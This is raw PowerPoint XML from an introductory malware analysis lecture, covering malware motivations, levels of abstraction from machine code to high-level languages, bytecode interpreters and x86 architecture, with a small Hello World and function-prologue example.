              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Identify any live memory modification?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>What are the malware’s host-based indicators?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>What is the goal of this malware?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Estimation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Send results to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>sontt@viethanit.edu.vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="985640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Existence &amp; Motivation </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Existence: perceived as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> or the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>weapon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> of an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>individual, organization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>intending an unethical or illegal act concerning computers and data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Motivations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>to wreck havoc: playing a prank, crash PCs, domain unavailable, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>gain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>profit: spam sending as a service, stealing financial or personal data, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23244212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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Level of Abstraction</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5724128" y="2420888"/>
            <a:ext cx="24259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723430" y="2679303"/>
            <a:ext cx="1590500" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 0x40</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1187624" y="2420888"/>
            <a:ext cx="24259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186926" y="2679303"/>
            <a:ext cx="2426690" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“Hello World\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit(0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3543265" y="4829111"/>
            <a:ext cx="24259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4072045" y="5055567"/>
            <a:ext cx="999504" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>55</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8B EC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8B EC 40</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1389221" y="1737682"/>
            <a:ext cx="2022798" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware writer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>High-level language</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5996167" y="1737681"/>
            <a:ext cx="1978619" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Malware analyst</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Low-level language</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3771586" y="4182780"/>
            <a:ext cx="1510029" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>CPU </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Machine code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Down Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19312411">
            <a:off x="2433970" y="3896309"/>
            <a:ext cx="325996" cy="1584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own Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12970652">
            <a:off x="6687157" y="3832399"/>
            <a:ext cx="265049" cy="1584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327637" y="4628544"/>
            <a:ext cx="1037463" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Complier</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6875484" y="4686235"/>
            <a:ext cx="2242730" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Disassembler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>(Reverse-Engineering)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4585073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Disassembly</a:t>
            </a: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t>Level of Abstraction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Physical; electronical circuits; logic gates (AND, OR, ..)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Firmware (microcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Only operates on the designed circuit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Set of micro-instructions translated from high machine code level to interact with hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Machine code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Hexadecimal digits (Opcodes) generated when high-level language compiled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Underlying hardware can execute (+ microcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Low-level languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Human-readable version of a computer architecture's instruction set (e.g. assembly language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21503772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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>High-level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>C, C++</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Interpreted languages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>C#, Perl,. NET, Java, Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>It is NOT complied into machine-code, translated into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Bytecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> instead.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Bytecode executes within an interpreter which translates bytecode into executables machine code on the fly at runtime.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Reduce the dependence on hardware and OS. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Can run on VM, e.g. JVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27814144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Disassembly</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode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49468"/>
            <a:ext cx="6903566" cy="256756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descr="Káº¿t quáº£ hÃ¬nh áº£nh cho bytecode interpr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631" y="3964260"/>
            <a:ext cx="688657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1310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X86 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>X86 Architecture </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Von Neumann architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="972006" y="2294560"/>
            <a:ext cx="5101912" cy="3888432"/>
            <a:chOff x="1619672" y="2420888"/>
            <a:chExt cx="5101912" cy="3888432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1619672" y="2492896"/>
              <a:ext cx="3600400" cy="2880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2195736" y="2780928"/>
              <a:ext cx="2664296" cy="9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rapezoid 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2339752" y="4149080"/>
              <a:ext cx="1188132" cy="79208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851920" y="4149080"/>
              <a:ext cx="115212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5796136" y="2492896"/>
              <a:ext cx="792088"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19672" y="5661248"/>
              <a:ext cx="36004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946935" y="3046312"/>
              <a:ext cx="1025987" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Registers</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2705770" y="4209607"/>
              <a:ext cx="558038" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>ALU</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3972922" y="4221958"/>
              <a:ext cx="972886" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Control Unit</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2979344" y="5800618"/>
              <a:ext cx="1254318" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
